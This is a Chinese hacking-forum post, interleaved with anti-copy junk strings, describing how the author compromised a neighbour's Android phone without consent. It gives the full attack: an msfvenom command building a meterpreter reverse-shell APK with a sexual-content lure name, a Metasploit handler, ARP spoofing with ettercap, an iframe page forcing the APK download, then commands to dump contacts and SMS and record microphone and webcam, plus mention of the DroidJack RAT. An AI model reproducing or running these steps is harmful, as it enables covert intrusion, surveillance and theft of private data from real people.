找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1615|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 T$ V; q8 [$ z" { \: x! {0 m 五、msf+ettercap入侵邻居安卓手机 i" _8 b3 k) W/ @8 n, R

6 [& J# e- I. \2 b$ ~* J' @8 d

' L0 B! D; Z5 c$ M2 f" Q 首先启动msf * I% w2 K6 v% S

% I' y5 e3 S+ k" \

, V$ d7 \5 \8 ?- ~$ A6 V" v 先用kali生成一个安卓木马,如下命令: & ]4 R0 }0 s. N) P3 H: R

) z0 I% r5 x) p5 w

4 b: A: d4 A% X9 N+ R Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk a! y k& ]8 i# G& h

6 C: j6 b- s7 p! Q$ s% S& l

! U2 a, h7 |# |4 Z6 X 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 + w. M4 O% V7 X3 }

F+ k( M- Z! l' P$ n7 Q8 r

1 t, t/ K9 ]7 ]1 I% f 然后进入msf $ v, g6 V+ e. p& [+ N7 H

5 @! U7 L/ o1 o( H' e( _! n- M# ?7 L

, r z! m" C" l$ M% w0 g use exploit/multi/handler 1 L J1 }7 i. |' F: ~

9 x/ G0 k$ [% ]8 V

4 I) R1 `' j4 e set payload android/meterpreter/reverse_tcp , R3 B6 P: X2 d4 j, O5 d

, h& F6 Y! F2 l5 ]. J$ V( r3 e

. c+ X1 U z8 _& X r set LHOST 192.168.0.109 //ipkailiip 5 E8 I( {% G5 k2 Y

% m5 b6 W) O9 e2 W

# V7 k, l/ V+ t. B v set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) S" _& B! ^% H0 v: |5 Q. l1 p

8 A+ b1 I2 ] O( K( ^

6 \2 F; ]' e" v0 j! X5 _ Exploit 8 j8 j( o3 n! a2 k

3 X, c( A3 W5 p f2 @) v

4 v( H) s' n1 s   ) L) a& C: k4 a s4 H$ h, J

& l6 p/ r# N, y5 l5 @

4 o5 _2 V0 _# D* P$ X 下面我们开启ettercap -G 4 ^7 `8 E& @) h& E* G

2 {% A3 O( @& L

( h0 Q8 S7 }. g+ t 我物理IP 1 @% J) d0 j% z3 G* H: j' m

5 w7 D& p6 o$ a$ X% ~9 N$ Y) H, k! p$ H

* W; W3 c- D$ w- i1 [* ?6 f7 R   # ?- p; N ?, d( m# ~2 X

8 ~" g: T9 m0 @' }# T2 z

. y; M% I0 v) `! M& E- E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) ~/ }. h) K8 W, |+ c

2 Q- v$ [, Z9 f, `$ e) T: }

# o6 J' }6 ~0 h. f/ X4 ?7 p 下面我们来设置一下 : F6 q, L0 ?( e5 X

S" d$ N% F0 ]7 u

- d. m$ h. B6 ^2 A   ) ~7 K& {; v2 T4 b

+ r/ b- b; z2 Z& e! a( K0 h

1 n& X2 N0 z, O3 n8 n 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 T4 j4 S/ ~1 I4 m

1 d( T; _3 B2 O

/ d' \: D8 S( ` }% b: u, j/ d   " d6 A, W! f5 S% ~9 B2 }4 Y

& r7 \0 f/ p9 g

6 F0 f% y& J/ |' ?6 L1 @   ( o+ O- C8 I/ H9 s' e7 F7 w

! y/ F U* ?4 y9 Q

/ S+ k Q, c( B( g   7 \3 o0 J; X; e- G$ Z; R

* ~1 e' v5 K$ I4 K# E

, e* ]% h+ z4 T3 `) t& i   : G, V/ ]0 X$ }

* u/ x7 @( E, n) h8 a$ a

- t; m5 B4 l H# ^) k   7 u9 U `1 C# K6 e7 k% m

7 F4 E( `2 E. M5 a; o5 D# o

, q' F* W6 N8 N% |5 B+ A- v& R   / H6 a* G8 [, r. B: `0 r

( T) R. a8 h# `

7 U/ f2 X) l- W) P5 H' g   % f0 _8 S0 {4 p# g

7 D- m0 G' V0 f5 i4 E/ S

4 h/ ?# H& S7 T   ( G! d9 U: y) v8 `9 w

& o7 k5 V# [, n+ J

" j o( j4 z" J) W9 T   4 b, V2 G3 x+ F$ a. n

8 y7 E7 T* ]7 k' m- p& E% W

" Y: U- _" \6 l9 q9 e   - \( g! i6 l+ J5 W* {; f, C

, Z! O$ e4 C- ]4 @

1 I- L( R( x7 H   & m) k" u4 g6 n' {2 @+ r$ Y# A

: i0 C! s" w U9 H' e: M: a3 t7 `3 X

' D! P& h8 v6 r7 @3 O   ' E' f2 \' w* ^1 Z$ k) S

: U* L8 x- p; ?6 Y$ s* c

! s( U1 x. c/ @# F O a   * h; k: O. w' B1 q: r( K' E

* f( G5 f) V' z" W$ N

0 ]2 G6 D1 x% { 下面我们开始攻击 ( c" R1 m+ y( ]/ D

% e4 C$ A' X! P* M; ~+ _

( ^; D) U0 P- _9 ?8 n& I8 B   ' L9 [- @% ^9 G. r, f" A5 T4 [

+ c# E: J- p3 z0 t$ p5 D( M# c

. c9 k% M- V7 R1 M& q$ n* a   7 V" {" q# L# j* W' T

7 ?% g# @3 q" H/ v" r

4 l5 g' i% u! v' \0 X+ H; {   ; T3 o' x& N0 \4 u, e% s. X+ \# |

% G! e4 F; Z& C1 G' z) O0 G5 g0 G

0 D- B i1 m) @& `/ u% Z, s   4 Q& M$ s8 ^! A. u. X9 P1 J

) C# C' v8 N! n" c0 F T7 Y$ V

8 T0 s: P7 K9 e# w3 G, A7 E w   / ?' B# @, S* V: I, M8 V

, ^" ]! y/ a) @+ B

' |4 b+ o$ H7 W2 P) ]4 B: O9 [ 大概过了5分钟多,发现反弹成功了 2 Y* t/ J/ p1 ^3 i) T) T9 ]

1 ]& e4 z6 X6 I# B% V- Q, I5 @$ ?

! c5 N" z0 A* N   ' D* Q- m! T0 G2 p: o0 y2 q

* J- I4 O5 S6 L* S5 A

9 M/ g- c, L% ^. C8 v   : G* ^: E6 s# z4 ^

9 r( E- w: {1 Y8 e

% t. h# e9 i u   ' s1 l/ g! F' f" i5 P+ F

8 F8 f" E3 H2 R, {/ b+ t5 g3 R

$ C" Z3 X( b9 I2 Z! M" \   1 C k& ]. X, C3 h8 d/ v+ I8 C4 a

/ d$ R& x$ a% ^

( q) s8 P5 n& o8 N   " i; g) p: Y6 W2 ^

! m. m6 ^; J0 d5 i) [' ]

1 g$ e w# T1 b) H4 M   / d$ x `7 K3 J4 @% M9 A0 r+ M1 M

# L) @3 p# j2 M( y; j

' Z" I) ~# O0 x4 x( t& X' c/ t   0 A$ S; z% T4 t6 l" u

$ h9 Y# j" ^, }/ g* @- r

* ]3 [. m3 e( }$ h) H$ T 执行命令 ' X& c7 o9 x' `8 |8 B' ~/ ?$ [

5 X# `: o d7 g2 f# v1 } W

! e' G9 ]& @+ q' L3 Z; x( S+ q! D   + K& @8 O: L8 z1 p

) F @$ c' ^+ m" c5 }) Z! I

% X' E) S; a% r6 M4 r; M1 R dump_contacts    --》这个是导出电话 9 G5 k+ |# Q/ B" x, |) D4 A" ]

- q/ j5 p1 {4 H! c, i. W, `

- w _4 v( }# e: O- A5 A* R dump_sms --》这个是导出信息 # k+ Y0 d0 X% [

' k& t: \9 h) L$ k

. \- L N4 Z+ a8 ^/ Q0 K) G4 l record_mic     Record audio from the default microphone for X seconds 4 {: y# @5 @, L& i7 x( T

. R: p9 E3 L- ?$ j+ O( S

7 n5 F# k( b7 r; X% F) l; {     webcam_chat    Start a video chat 5 w# J, J n- {5 U2 Z

# k5 J, J, Z9 \; F. P7 x& N

' n1 y1 ^9 B0 O     webcam_list    List webcams 3 O) \$ `' a O) ~! n; b$ w9 K$ n7 M

' C( h3 s7 s) [8 d4 A- k: F

' [9 l7 ^/ X2 j, ?. Y7 Q     webcam_snap    Take a snapshot from the specified webcam 2 f* W0 C. `# H

* C4 c5 R4 ]) L4 I& P, }0 z5 P

3 O: t( M" i) x webcam_stream  lay a video stream from the specified webcam * e$ S: f6 }5 }! y1 j

1 f( v# z" |* m7 f7 Y

% f( r( o1 f2 g- D- `9 c8 k   ' g1 M$ [1 S b

9 x' h! { H0 }0 N

: P% s8 ~( ^( ], I) p; j" c7 g5 l   # k3 N5 S1 k b# |! k

8 `" C& N# M% p/ t# F

C+ w* f4 P* _" Z 我们打开看一下电话薄, ( c. m" D7 @- B/ K2 \

: o/ k, M1 R1 f0 B

- m$ \4 p% E: c& Z7 s. i   ~; d, d: o% x

& _0 ]8 o7 w2 u R4 B4 P

$ ?% ~& E- M, k+ J   ! U4 c* a8 B5 G( f2 r6 m! V; H/ C

' p4 ^, z% ]' M/ ]; u* ?! g

( E: H! L, m, @3 g& Z0 x   ' P; @) f% Q/ N+ z# X' a- d) b

0 [7 U: X7 C; R! K. f- `1 H

1 |$ d/ A X0 S/ [% i! |+ w! q   ( z5 `: [& j" F( C/ w" l7 t

# b$ I8 O- A, ]& l5 {8 v3 o

; K- B3 l- e0 ~* d4 p   : k2 v! Y/ H# k+ J5 U$ G7 v

O+ u2 q5 P: T4 H# I

; {+ g% v$ Z* C$ U/ z& \) n6 Z9 t   9 [3 }, `' a } \" l9 l

6 |2 {8 Y% L8 D8 @6 x6 ~* \, N

: b, M. O/ N, g( [ 我们同时欺骗成DroidJack木马,使用方法如图: 9 }* P7 Z1 s1 S( o' O5 x

; m5 a, f) d R, Z4 ^4 N$ t( D

8 X! g) m2 l7 \% |# b! M# p   7 }) p$ O' M9 m- \' e$ t

) `* m; z; a4 }& ~) r5 Q+ O

7 v) k/ w7 i5 P   4 V) ?! ?- T1 j, A8 `7 f

- Z+ q* B2 N9 v- W2 `* q8 c

+ R4 N; t; R4 C3 x   7 u- i; J1 F: f* y7 {

7 w6 K* Q) D- j5 ?* m8 ^0 e

/ d+ y$ f8 J& B8 r# `- v% u 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 9 Q3 e7 p$ J5 w. T0 v' o

# j* O* c7 e2 B$ `; B/ O

% N( b; R+ ?( L" u6 @   ; g7 y0 U, q" x t& N; n

! u5 _/ f8 Z; M3 s4 i

3 m' Y5 S! z0 z* e- R: e$ A   1 P3 [6 \- b: J3 s5 L0 s" i1 j

6 K# |/ s: t) I$ D8 z

" @6 S+ c9 n6 I0 J; y( b   4 J0 X6 @! X# m. h0 z

, k9 p7 |) L! }2 l

# I9 M+ k8 ^: C. p2 N 6 c4 S: Z( x; s/ o" K8 J# b

; D7 e L g2 @ e

* s0 s& G1 f% G: v, |' _
# n x1 X- ^- G- _; b

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表